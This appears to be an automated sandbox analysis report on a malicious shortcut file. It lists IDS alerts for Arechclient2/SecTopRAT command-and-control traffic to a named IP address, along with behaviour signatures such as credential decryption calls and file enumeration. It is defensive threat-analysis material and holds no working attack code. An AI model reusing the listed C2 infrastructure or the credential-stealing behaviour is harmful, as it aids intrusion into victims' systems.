2024-12-17T08:39:15.559621+0100	2803305	3	Unknown Traffic	192.168.2.11	49866	92.255.57.75	9000	TCP
2024-12-17T08:39:17.497250+0100	2803305	3	Unknown Traffic	192.168.2.11	49872	92.255.57.75	9000	TCP
2024-12-17T08:39:19.064007+0100	2803305	3	Unknown Traffic	192.168.2.11	49879	92.255.57.75	9000	TCP
2024-12-17T08:39:20.620349+0100	2803305	3	Unknown Traffic	192.168.2.11	49880	92.255.57.75	9000	TCP
2024-12-17T08:39:22.182572+0100	2803305	3	Unknown Traffic	192.168.2.11	49886	92.255.57.75	9000	TCP
2024-12-17T08:39:23.745974+0100	2803305	3	Unknown Traffic	192.168.2.11	49892	92.255.57.75	9000	TCP
2024-12-17T08:39:25.308426+0100	2803305	3	Unknown Traffic	192.168.2.11	49898	92.255.57.75	9000	TCP
2024-12-17T08:39:26.870284+0100	2803305	3	Unknown Traffic	192.168.2.11	49899	92.255.57.75	9000	TCP
2024-12-17T08:39:28.586573+0100	2803305	3	Unknown Traffic	192.168.2.11	49905	92.255.57.75	9000	TCP
2024-12-17T08:39:30.149636+0100	2803305	3	Unknown Traffic	192.168.2.11	49911	92.255.57.75	9000	TCP
2024-12-17T08:39:31.696759+0100	2803305	3	Unknown Traffic	192.168.2.11	49917	92.255.57.75	9000	TCP
2024-12-17T08:39:33.323133+0100	2803305	3	Unknown Traffic	192.168.2.11	49918	92.255.57.75	9000	TCP
2024-12-17T08:39:34.883749+0100	2803305	3	Unknown Traffic	192.168.2.11	49924	92.255.57.75	9000	TCP
2024-12-17T08:39:36.444153+0100	2803305	3	Unknown Traffic	192.168.2.11	49930	92.255.57.75	9000	TCP
2024-12-17T08:39:38.001727+0100	2803305	3	Unknown Traffic	192.168.2.11	49931	92.255.57.75	9000	TCP
2024-12-17T08:39:39.587952+0100	2803305	3	Unknown Traffic	192.168.2.11	49937	92.255.57.75	9000	TCP
2024-12-17T08:39:41.137150+0100	2803305	3	Unknown Traffic	192.168.2.11	49943	92.255.57.75	9000	TCP
2024-12-17T08:39:42.702171+0100	2803305	3	Unknown Traffic	192.168.2.11	49949	92.255.57.75	9000	TCP
2024-12-17T08:39:44.262768+0100	2803305	3	Unknown Traffic	192.168.2.11	49950	92.255.57.75	9000	TCP
2024-12-17T08:39:45.820751+0100	2803305	3	Unknown Traffic	192.168.2.11	49956	92.255.57.75	9000	TCP
2024-12-17T08:39:47.372943+0100	2803305	3	Unknown Traffic	192.168.2.11	49962	92.255.57.75	9000	TCP
2024-12-17T08:39:48.933542+0100	2803305	3	Unknown Traffic	192.168.2.11	49964	92.255.57.75	9000	TCP
2024-12-17T08:39:50.496459+0100	2803305	3	Unknown Traffic	192.168.2.11	49969	92.255.57.75	9000	TCP
2024-12-17T08:39:52.057375+0100	2803305	3	Unknown Traffic	192.168.2.11	49975	92.255.57.75	9000	TCP
2024-12-17T08:39:53.620267+0100	2803305	3	Unknown Traffic	192.168.2.11	49981	92.255.57.75	9000	TCP
2024-12-17T08:39:55.184361+0100	2803305	3	Unknown Traffic	192.168.2.11	49982	92.255.57.75	9000	TCP
2024-12-17T08:39:56.746834+0100	2803305	3	Unknown Traffic	192.168.2.11	49988	92.255.57.75	9000	TCP
2024-12-17T08:39:58.385009+0100	2803305	3	Unknown Traffic	192.168.2.11	49994	92.255.57.75	9000	TCP
2024-12-17T08:39:59.950905+0100	2803305	3	Unknown Traffic	192.168.2.11	49997	92.255.57.75	9000	TCP
2024-12-17T08:40:01.513011+0100	2803305	3	Unknown Traffic	192.168.2.11	50002	92.255.57.75	9000	TCP
2024-12-17T08:40:03.075227+0100	2803305	3	Unknown Traffic	192.168.2.11	50008	92.255.57.75	9000	TCP
2024-12-17T08:40:04.635475+0100	2803305	3	Unknown Traffic	192.168.2.11	50014	92.255.57.75	9000	TCP
2024-12-17T08:40:06.203953+0100	2803305	3	Unknown Traffic	192.168.2.11	50016	92.255.57.75	9000	TCP
2024-12-17T08:40:07.766361+0100	2803305	3	Unknown Traffic	192.168.2.11	50021	92.255.57.75	9000	TCP
2024-12-17T08:40:09.327298+0100	2803305	3	Unknown Traffic	192.168.2.11	50027	92.255.57.75	9000	TCP
2024-12-17T08:40:10.887777+0100	2803305	3	Unknown Traffic	192.168.2.11	50029	92.255.57.75	9000	TCP
2024-12-17T08:40:12.447907+0100	2803305	3	Unknown Traffic	192.168.2.11	50035	92.255.57.75	9000	TCP
2024-12-17T08:40:14.016690+0100	2803305	3	Unknown Traffic	192.168.2.11	50041	92.255.57.75	9000	TCP
2024-12-17T08:40:15.573240+0100	2803305	3	Unknown Traffic	192.168.2.11	50047	92.255.57.75	9000	TCP
2024-12-17T08:40:17.140306+0100	2803305	3	Unknown Traffic	192.168.2.11	50048	92.255.57.75	9000	TCP
2024-12-17T08:40:18.700637+0100	2803305	3	Unknown Traffic	192.168.2.11	50049	92.255.57.75	9000	TCP
2024-12-17T08:40:20.261661+0100	2803305	3	Unknown Traffic	192.168.2.11	50050	92.255.57.75	9000	TCP
2024-12-17T08:40:21.824581+0100	2803305	3	Unknown Traffic	192.168.2.11	50051	92.255.57.75	9000	TCP
2024-12-17T08:40:23.394151+0100	2803305	3	Unknown Traffic	192.168.2.11	50052	92.255.57.75	9000	TCP
2024-12-17T08:40:24.956353+0100	2803305	3	Unknown Traffic	192.168.2.11	50053	92.255.57.75	9000	TCP
2024-12-17T08:40:26.509896+0100	2803305	3	Unknown Traffic	192.168.2.11	50054	92.255.57.75	9000	TCP
2024-12-17T08:40:28.063631+0100	2803305	3	Unknown Traffic	192.168.2.11	50055	92.255.57.75	9000	TCP
2024-12-17T08:40:29.622720+0100	2803305	3	Unknown Traffic	192.168.2.11	50056	92.255.57.75	9000	TCP
2024-12-17T08:40:31.209899+0100	2803305	3	Unknown Traffic	192.168.2.11	50057	92.255.57.75	9000	TCP
2024-12-17T08:40:32.788179+0100	2803305	3	Unknown Traffic	192.168.2.11	50058	92.255.57.75	9000	TCP
2024-12-17T08:40:34.356389+0100	2803305	3	Unknown Traffic	192.168.2.11	50059	92.255.57.75	9000	TCP
2024-12-17T08:40:35.953959+0100	2803305	3	Unknown Traffic	192.168.2.11	50060	92.255.57.75	9000	TCP
2024-12-17T08:40:37.511141+0100	2803305	3	Unknown Traffic	192.168.2.11	50061	92.255.57.75	9000	TCP
2024-12-17T08:40:39.071988+0100	2803305	3	Unknown Traffic	192.168.2.11	50063	92.255.57.75	9000	TCP
2024-12-17T08:40:40.626669+0100	2803305	3	Unknown Traffic	192.168.2.11	50065	92.255.57.75	9000	TCP
2024-12-17T08:40:42.180961+0100	2803305	3	Unknown Traffic	192.168.2.11	50066	92.255.57.75	9000	TCP
2024-12-17T08:40:43.729983+0100	2803305	3	Unknown Traffic	192.168.2.11	50067	92.255.57.75	9000	TCP
2024-12-17T08:40:45.294166+0100	2803305	3	Unknown Traffic	192.168.2.11	50068	92.255.57.75	9000	TCP
2024-12-17T08:40:46.855979+0100	2803305	3	Unknown Traffic	192.168.2.11	50069	92.255.57.75	9000	TCP
2024-12-17T08:40:48.416564+0100	2803305	3	Unknown Traffic	192.168.2.11	50070	92.255.57.75	9000	TCP
2024-12-17T08:40:49.995213+0100	2803305	3	Unknown Traffic	192.168.2.11	50071	92.255.57.75	9000	TCP
2024-12-17T08:40:51.560552+0100	2803305	3	Unknown Traffic	192.168.2.11	50072	92.255.57.75	9000	TCP
2024-12-17T08:40:53.129769+0100	2803305	3	Unknown Traffic	192.168.2.11	50073	92.255.57.75	9000	TCP
2024-12-17T08:40:54.686702+0100	2803305	3	Unknown Traffic	192.168.2.11	50074	92.255.57.75	9000	TCP
2024-12-17T08:40:56.242629+0100	2803305	3	Unknown Traffic	192.168.2.11	50075	92.255.57.75	9000	TCP
2024-12-17T08:40:57.876736+0100	2803305	3	Unknown Traffic	192.168.2.11	50076	92.255.57.75	9000	TCP
2024-12-17T08:40:59.431179+0100	2803305	3	Unknown Traffic	192.168.2.11	50077	92.255.57.75	9000	TCP
2024-12-17T08:41:01.008999+0100	2803305	3	Unknown Traffic	192.168.2.11	50078	92.255.57.75	9000	TCP
2024-12-17T08:41:02.588341+0100	2803305	3	Unknown Traffic	192.168.2.11	50079	92.255.57.75	9000	TCP
2024-12-17T08:41:04.369272+0100	2803305	3	Unknown Traffic	192.168.2.11	50080	92.255.57.75	9000	TCP
2024-12-17T08:41:05.928916+0100	2803305	3	Unknown Traffic	192.168.2.11	50081	92.255.57.75	9000	TCP
2024-12-17T08:41:07.478669+0100	2803305	3	Unknown Traffic	192.168.2.11	50082	92.255.57.75	9000	TCP
2024-12-17T08:41:09.030420+0100	2803305	3	Unknown Traffic	192.168.2.11	50083	92.255.57.75	9000	TCP
2024-12-17T08:41:10.591098+0100	2803305	3	Unknown Traffic	192.168.2.11	50084	92.255.57.75	9000	TCP
2024-12-17T08:41:12.148606+0100	2803305	3	Unknown Traffic	192.168.2.11	50085	92.255.57.75	9000	TCP
2024-12-17T08:41:13.698083+0100	2803305	3	Unknown Traffic	192.168.2.11	50086	92.255.57.75	9000	TCP
2024-12-17T08:41:15.266836+0100	2803305	3	Unknown Traffic	192.168.2.11	50087	92.255.57.75	9000	TCP
2024-12-17T08:41:16.827334+0100	2803305	3	Unknown Traffic	192.168.2.11	50088	92.255.57.75	9000	TCP
2024-12-17T08:41:18.422781+0100	2803305	3	Unknown Traffic	192.168.2.11	50089	92.255.57.75	9000	TCP
2024-12-17T08:41:19.978640+0100	2803305	3	Unknown Traffic	192.168.2.11	50090	92.255.57.75	9000	TCP
2024-12-17T08:41:21.555765+0100	2803305	3	Unknown Traffic	192.168.2.11	50091	92.255.57.75	9000	TCP
2024-12-17T08:41:23.200006+0100	2803305	3	Unknown Traffic	192.168.2.11	50092	92.255.57.75	9000	TCP
2024-12-17T08:41:24.759180+0100	2803305	3	Unknown Traffic	192.168.2.11	50093	92.255.57.75	9000	TCP
2024-12-17T08:41:26.311298+0100	2803305	3	Unknown Traffic	192.168.2.11	50094	92.255.57.75	9000	TCP
2024-12-17T08:41:27.873593+0100	2803305	3	Unknown Traffic	192.168.2.11	50096	92.255.57.75	9000	TCP
2024-12-17T08:41:29.431685+0100	2803305	3	Unknown Traffic	192.168.2.11	50097	92.255.57.75	9000	TCP
2024-12-17T08:41:30.998176+0100	2803305	3	Unknown Traffic	192.168.2.11	50098	92.255.57.75	9000	TCP
2024-12-17T08:41:32.560204+0100	2803305	3	Unknown Traffic	192.168.2.11	50099	92.255.57.75	9000	TCP
2024-12-17T08:41:34.128273+0100	2803305	3	Unknown Traffic	192.168.2.11	50100	92.255.57.75	9000	TCP
2024-12-17T08:41:35.695801+0100	2803305	3	Unknown Traffic	192.168.2.11	50101	92.255.57.75	9000	TCP
2024-12-17T08:41:37.312462+0100	2803305	3	Unknown Traffic	192.168.2.11	50102	92.255.57.75	9000	TCP
2024-12-17T08:41:38.874060+0100	2803305	3	Unknown Traffic	192.168.2.11	50103	92.255.57.75	9000	TCP
2024-12-17T08:41:40.436730+0100	2803305	3	Unknown Traffic	192.168.2.11	50104	92.255.57.75	9000	TCP
2024-12-17T08:41:42.010830+0100	2803305	3	Unknown Traffic	192.168.2.11	50105	92.255.57.75	9000	TCP
2024-12-17T08:41:43.574508+0100	2803305	3	Unknown Traffic	192.168.2.11	50106	92.255.57.75	9000	TCP
2024-12-17T08:41:45.134788+0100	2803305	3	Unknown Traffic	192.168.2.11	50108	92.255.57.75	9000	TCP
2024-12-17T08:41:46.742376+0100	2803305	3	Unknown Traffic	192.168.2.11	50110	92.255.57.75	9000	TCP
2024-12-17T08:41:48.291590+0100	2803305	3	Unknown Traffic	192.168.2.11	50111	92.255.57.75	9000	TCP
2024-12-17T08:41:49.859405+0100	2803305	3	Unknown Traffic	192.168.2.11	50112	92.255.57.75	9000	TCP
2024-12-17T08:41:51.418630+0100	2803305	3	Unknown Traffic	192.168.2.11	50113	92.255.57.75	9000	TCP
2024-12-17T08:41:52.980262+0100	2803305	3	Unknown Traffic	192.168.2.11	50114	92.255.57.75	9000	TCP
2024-12-17T08:41:54.587030+0100	2803305	3	Unknown Traffic	192.168.2.11	50115	92.255.57.75	9000	TCP
2024-12-17T08:41:56.247736+0100	2803305	3	Unknown Traffic	192.168.2.11	50116	92.255.57.75	9000	TCP
2024-12-17T08:41:57.820857+0100	2803305	3	Unknown Traffic	192.168.2.11	50117	92.255.57.75	9000	TCP
2024-12-17T08:41:59.373645+0100	2803305	3	Unknown Traffic	192.168.2.11	50119	92.255.57.75	9000	TCP
2024-12-17T08:42:00.936757+0100	2803305	3	Unknown Traffic	192.168.2.11	50120	92.255.57.75	9000	TCP
2024-12-17T08:42:02.626168+0100	2803305	3	Unknown Traffic	192.168.2.11	50121	92.255.57.75	9000	TCP
2024-12-17T08:42:04.197750+0100	2803305	3	Unknown Traffic	192.168.2.11	50122	92.255.57.75	9000	TCP
2024-12-17T08:42:05.762277+0100	2803305	3	Unknown Traffic	192.168.2.11	50123	92.255.57.75	9000	TCP
2024-12-17T08:42:07.342589+0100	2803305	3	Unknown Traffic	192.168.2.11	50124	92.255.57.75	9000	TCP
2024-12-17T08:42:08.903624+0100	2803305	3	Unknown Traffic	192.168.2.11	50125	92.255.57.75	9000	TCP
2024-12-17T08:42:10.466558+0100	2803305	3	Unknown Traffic	192.168.2.11	50127	92.255.57.75	9000	TCP
2024-12-17T08:42:12.025774+0100	2803305	3	Unknown Traffic	192.168.2.11	50128	92.255.57.75	9000	TCP
2024-12-17T08:42:13.592122+0100	2803305	3	Unknown Traffic	192.168.2.11	50129	92.255.57.75	9000	TCP
2024-12-17T08:42:15.154112+0100	2803305	3	Unknown Traffic	192.168.2.11	50130	92.255.57.75	9000	TCP
2024-12-17T08:42:16.722434+0100	2803305	3	Unknown Traffic	192.168.2.11	50132	92.255.57.75	9000	TCP
2024-12-17T08:42:18.277830+0100	2803305	3	Unknown Traffic	192.168.2.11	50133	92.255.57.75	9000	TCP
2024-12-17T08:42:19.840543+0100	2803305	3	Unknown Traffic	192.168.2.11	50134	92.255.57.75	9000	TCP
2024-12-17T08:42:21.404382+0100	2803305	3	Unknown Traffic	192.168.2.11	50135	92.255.57.75	9000	TCP
2024-12-17T08:42:23.000105+0100	2803305	3	Unknown Traffic	192.168.2.11	50136	92.255.57.75	9000	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T08:38:40.291525+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49772	188.114.97.6	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: sEOELQpFOB.lnk

ReversingLabs: Detection: 13%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 21_2_069D7BD8 CryptUnprotectData,		21_2_069D7BD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 21_2_069D7BD0 CryptUnprotectData,		21_2_069D7BD0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.11:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 83.166.133.91:443 -> 192.168.2.11:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.11:49729 version: TLS 1.2

Source:	Binary string: wntdll.pdbUGP source: updater.exe, 00000014.00000003.1667032844.0000000004E08000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000014.00000002.1675294005.0000000004FA4000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000014.00000003.1666853794.0000000004F29000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000002.1846289188.0000000004C54000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000003.1832264833.0000000004AB8000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000003.1831878369.0000000004BD9000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001A.00000002.1916362932.0000000004A64000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001A.00000003.1908503222.00000000048C8000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001A.00000003.1908305023.00000000049E9000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: updater.exe, 00000014.00000003.1667032844.0000000004E08000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000014.00000002.1675294005.0000000004FA4000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000014.00000003.1666853794.0000000004F29000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000002.1846289188.0000000004C54000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000003.1832264833.0000000004AB8000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000003.1831878369.0000000004BD9000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001A.00000002.1916362932.0000000004A64000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001A.00000003.1908503222.00000000048C8000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001A.00000003.1908305023.00000000049E9000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_00374005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	20_2_00374005
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_0037C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	20_2_0037C2FF
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_0037494A GetFileAttributesW,FindFirstFileW,FindClose,	20_2_0037494A
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_0037CD14 FindFirstFileW,FindClose,	20_2_0037CD14
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_0037CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	20_2_0037CD9F
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_0037F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	20_2_0037F5D8
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_0037F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	20_2_0037F735
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_0037FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	20_2_0037FA36
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_00373CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	20_2_00373CE2
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_016D68B5 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	20_2_016D68B5
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_016D41E5 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	20_2_016D41E5
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_016D69BD FindFirstFileA,GetLastError,	20_2_016D69BD
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00CE4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	22_2_00CE4005
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00CEC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	22_2_00CEC2FF
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00CE494A GetFileAttributesW,FindFirstFileW,FindClose,	22_2_00CE494A
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00CECD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	22_2_00CECD9F
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00CECD14 FindFirstFileW,FindClose,	22_2_00CECD14
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00CEF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	22_2_00CEF5D8
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00CEF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	22_2_00CEF735
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00CEFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	22_2_00CEFA36
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00CE3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	22_2_00CE3CE2
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_013436ED FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	22_2_013436ED
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_0134101D GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	22_2_0134101D
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_013437F5 FindFirstFileA,GetLastError,	22_2_013437F5

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06B6CCA9h	21_2_06B6CB88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06B6CCA9h	21_2_06B6CB78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06B6CCA9h	21_2_06B6CCB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then mov eax, dword ptr [ebp-28h]	21_2_06D3AAF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06D35EF1h	21_2_06D35240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then mov eax, dword ptr [ebp-68h]	21_2_06D35240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06D36546h	21_2_06D35240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06FB5403h	21_2_06FB4DDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06FB5403h	21_2_06FB53DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0769AAACh	21_2_07699AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0769AAACh	21_2_07699AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 07E878FCh	21_2_07E87466
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 07E8C1E1h	21_2_07E8C1C9

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.11:49796 -> 92.255.57.75:15647
Source: Network traffic	Suricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 92.255.57.75:15647 -> 192.168.2.11:49796
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:49808 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:49819 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:49821 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:49827 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:49832 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:49814 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:49846 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:49853 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:49851 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:49859 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:49840 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:49879 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:49872 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:49880 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:49892 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:49864 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:49899 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:49838 -> 92.255.57.75:9000
